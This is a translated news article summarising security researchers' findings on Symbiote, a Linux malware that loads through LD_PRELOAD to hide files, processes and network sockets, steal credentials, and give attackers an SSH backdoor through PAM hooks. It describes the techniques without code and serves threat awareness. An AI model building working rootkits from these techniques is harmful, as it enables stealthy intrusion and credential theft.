The Intezer and BlackBerry researchers released recently they have discovered a malware with code name «symbiote», which is characterized by being used to inject backdoors and rootkits into compromised Linux servers.
This malicious software it was found in the systems of financial institutions in several Latin American countries. A feature of Symbiote is distribution as a shared library, which is loaded during startup of all processes using the LD_PRELOAD mechanism and replaces some calls to the standard library.
What sets Symbiote apart from other Linux malware we regularly come across is that it needs to infect other running processes in order to inflict damage on infected computers.
Rather than being a stand-alone executable file that is run to infect a machine, it is a shared object (OS) library that is loaded into all running processes via LD_PRELOAD (T1574.006) and parasitically infects the machine. Once it has infected all running processes, it provides the threat actor with rootkit functionality, the ability to collect credentials, and remote access capability.
To be able to install Symbiote in a system, an attacker must have root access, which can be obtained, for example, as a result of exploiting unpatched vulnerabilities or account hacking. symbiotee allows the attacker to ensure his presence in the system after the hack to perform further attacks, hide the activity of other malicious apps, and arrange for the interception of sensitive data.
Our earliest detection of Symbiote is from November 2021, and it appears to have been written to target the financial sector in Latin America. Once malware has infected a machine, it hides itself and any other malware used by the threat actor, making infections very difficult to detect. Performing live forensics on an infected machine may not reveal anything, as the malware hides all files, processes, and network artifacts. In addition to rootkit capability, the malware provides a backdoor for the threat actor to log in as any user on the machine with a hardcoded password and execute commands with the highest privileges.
Spoofed call handlers hide activity related to the back door, such as excluding individual elements in the process list, block access to certain files in /proc, hide files in directories, exclude a malicious shared library from ldd output (the execve function is intercepted and calls are parsed with an LD_TRACE_LOADED_OBJECTS environment variable) show no network sockets associated with malicious activity.
symbiote also allows bypassing some file system activity scanners, since sensitive data theft can be carried out not at the level of opening files, but by intercepting read operations of these files in legitimate applications (for example, library substitution functions allow you to intercept user input of a password or files loaded from a data access key file).
Since it is extremely elusive, a Symbiote infection is likely to "fly under the radar." In our investigation, we have not found enough evidence to determine whether Symbiote is being used in broad or highly targeted attacks.
To organize remote login, Symbiote intercepts some PAM calls (Pluggable Authentication Module), which allows you to connect to the system via SSH with certain attack credentials. There is also a hidden option to elevate your privileges to root by setting the HTTP_SETTHIS environment variable.
To protect against traffic inspection, libpcap library functions are redefined, reading of /proc/net/tcp is filtered, and additional code is inserted into BPF programs loaded into the kernel.
Finally if you are interested in knowing more about it about the note, you can consult the original article in the following link